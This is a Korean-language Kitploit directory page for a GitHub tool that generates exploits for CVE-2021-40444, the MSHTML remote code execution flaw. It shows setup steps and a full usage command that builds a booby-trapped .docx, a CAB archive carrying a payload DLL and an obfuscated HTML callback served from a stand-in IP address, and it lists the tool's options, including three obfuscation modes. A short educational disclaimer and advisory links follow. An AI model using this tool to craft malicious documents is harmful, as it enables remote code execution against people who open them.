Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-40444 — CVE-2021-40444 (MSHTML RCE)를 위한 Python 기반 익스플로잇 생성기로, 템플릿 기반 페이로드 전달을 통해 악성 Office 문서, CAB 아카이브, 난독화된 HTML/JS 콜백을 사용합니다. | Kitploit
도구/GitHubGitHub/h0j3n/cve-2021-40444
Payload GenerationExploitationWeb Application ExploitationCommand and ControlLearning & Education
GitHubh0j3n/cve-2021-40444

CVE-2021-40444

CVE-2021-40444 (MSHTML RCE)를 위한 Python 기반 익스플로잇 생성기로, 템플릿 기반 페이로드 전달을 통해 악성 Office 문서, CAB 아카이브, 난독화된 HTML/JS 콜백을 사용합니다.

저장소 보기
11464년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-40444

사용법

먼저 setup.sh를 실행해야 합니다. 몇 개의 디렉터리가 필요하기 때문입니다. 스크립트를 실행한 후에는 아래 예제와 같이 gen.py를 실행할 수 있습니다:-

root@kitploit:~
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx 
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf 
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

참고

  1. http.server의 위치는 web 디렉터리에 있습니다. 이 디렉터리에는 다음 3개의 파일이 있습니다:-
  • .cab
  • .html
  • .docx

Verbose 미사용

without_verbose

Verbose 사용

with_verbose

면책 조항

이 저장소는 교육 목적으로만 제공되며, 악의적인 의도로 실제 환경에서 사용하기 위한 것이 아닙니다. 이 저장소의 불법적인 사용은 전적으로 사용자 본인의 책임과 위험 부담입니다.

참고 자료

  1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
  3. https://github.com/klezVirus/CVE-2021-40444
  4. https://github.com/lockedbyte/CVE-2021-40444
  5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
  6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
  7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
  8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
  9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
  11. https://blog.sunggwanchoi.com/remote-template-injection/
  12. https://youtube.com/watch?v=dgdx3QqPCuA
  13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution
도구 다운로드